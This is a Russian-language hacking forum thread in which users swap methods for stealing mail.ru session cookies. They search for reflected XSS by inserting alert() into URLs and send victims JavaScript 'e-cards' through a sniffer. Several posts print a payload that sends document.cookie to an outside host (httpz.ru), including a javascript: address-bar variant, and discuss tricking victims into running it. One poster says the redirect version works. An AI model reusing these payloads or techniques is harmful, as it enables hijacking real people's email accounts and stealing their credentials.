Мне каждый день приходят всякие типо акции,розыгрыши,опросы за которые типо платят,фейки,предупреждени я тип отправте смс..,рассылка тип чтобы от неё отписаться пройдите по ссылочке... Из всех этих кидал можно придумать одно хорошое!)))

Пассивка >alert() и пошёл по страницам искать, подставляя это в адресную строку...

нам тут гадать? для понта выложи код открытки тд и тп.

Цитата:

Сообщение от without_soul

hhhhh

Добавлено через 3 минуты
Подскажите плз :отправляю через снифер открытку яваскрипт,на мыло ,а в лог ничего не приходит после просмотра....да и при открытии не показывает картинку ,на которую вставил ссылку.....только пытаюсь учиться...!

для того чтоб приходило нужно найти пасивную xss на мыле как ето сделать?читай немного выше!
у тебя не прихдит так как пасивка уже не работает!

А как искать пассивку?
Просто подставлять в конец адресной строки alert() ?

у меня есть одна пассивка на маил ру, но работает только когда не вошел под аккаунтом ...
как только входишь, то уже не работает..:wink:

подскажите как решить или пассивка уже не работает ?

да о каком сниффере может идти речь на маил.ру??? Фотка-сниффер там уже не пашет!!!

обоснуй почему по твоему открытка не пашет?

img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;
пишет "неверный формат изображения". невозможно открыть изображение прям там же.куки не приходят. а насчет скрипта для адресной строки javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;') этот код вобще невозможно вставить как ссылку и подсунуть юзеру. или у кого получается? поделитесь,жаль чтоли?

Добавлено через 1 минуту
да не пашет на маил.ру это img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;
пишет "неверный формат изображения". невозможно открыть изображение прям там же.куки не приходят. а насчет скрипта для адресной строки javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;') этот код вобще невозможно вставить как ссылку и подсунуть юзеру.

Вотвот, согласен с terris куки неприходят, а заставить жертву скопировать и вставить код в адресную строку, причём в тойже вкладке что и письмо думаю нереально.

Добавлено через 1 минуту
(JavaScript код для адресной строки c редиректом действительно работает и куки приходят)